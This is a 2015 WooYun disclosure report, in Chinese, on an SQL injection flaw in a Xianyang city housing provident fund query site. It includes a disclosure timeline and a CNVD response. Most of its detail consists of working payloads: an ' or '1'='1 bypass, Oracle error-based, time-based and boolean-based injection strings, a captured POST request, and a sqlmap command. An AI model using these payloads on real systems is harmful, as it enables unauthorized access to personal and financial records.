陕西省某市住房公积金系统存在SQL注入漏洞

漏洞概要

缺陷编号:WooYun-2015-0129844

漏洞标题:陕西省某市住房公积金系统存在SQL注入漏洞

相关厂商:陕西省某市住房公积金

漏洞作者:毛毛虫

提交时间:2015-07-30 19:27

公开时间:2015-09-14 18:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-07-30: 细节已通知厂商并且等待厂商处理中
2015-07-31: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

陕西咸阳住房公积金某站存在SQL注入漏洞,缴费用户和缴费单位大量信息泄漏,仅列举几点,缴费用户涉及太多,未继续进行。

详细说明:

1.在单位账户查询页面中的“单位名称”和“单位账号”输入'or'1'='1,获取缴费单位的金额等信息

2.<code区域>POST /chaxun.asp HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/chaxun_danwei.aspCookie: ASPSESSIONIDASSASSRB=KNBCMCKCEKKMCLKBOLIHPFOJ; IsFirst=TrueConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 70DepartmentName=123&DepartmentNum=123&GetType=1&button=++%B2%E9%D1%AF++2.注入点Parameter: DepartmentNum (POST)Type: error-basedTitle: Oracle AND error-based - WHERE or HAVING clause (XMLType)Payload: DepartmentName=123&DepartmentNum=456' AND 4661=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (4661=4661) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'Umhb'='Umhb&GetType=1&button= %B2%E9%D1%AFVector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)Type: AND/OR time-based blindTitle: Oracle AND time-based blind (heavy query)Payload: DepartmentName=123&DepartmentNum=456' AND 7534=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'XUYO'='XUYO&GetType=1&button= %B2%E9%D1%AFVector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)Parameter: DepartmentName (POST)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clausePayload: DepartmentName=-2642' OR 4414=4414 AND 'qTYp'='qTYp&DepartmentNum=456&GetType=1&button= %B2%E9%D1%AFVector: OR [INFERENCE]Type: error-basedTitle: Oracle AND error-based - WHERE or HAVING clause (XMLType)Payload: DepartmentName=123' AND 2629=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2629=2629) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'GfsH'='GfsH&DepartmentNum=456&GetType=1&button= %B2%E9%D1%AFVector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)Type: AND/OR time-based blindTitle: Oracle AND time-based blind (heavy query)Payload: DepartmentName=123' AND 5424=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uKuN'='uKuN&DepartmentNum=456&GetType=1&button= %B2%E9%D1%AFVector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)3.运行过程sqlmap.py -u "http://**.**.**.**/chaxun.asp" --data="DepartmentName=123&DepartmentNum=456&GetType=1&button=++%B2%E9%D1%AF++" --risk=3 -v 3 --dbs

漏洞证明:

修复方案:

需尽快过滤修复。

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-3118:33

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

评价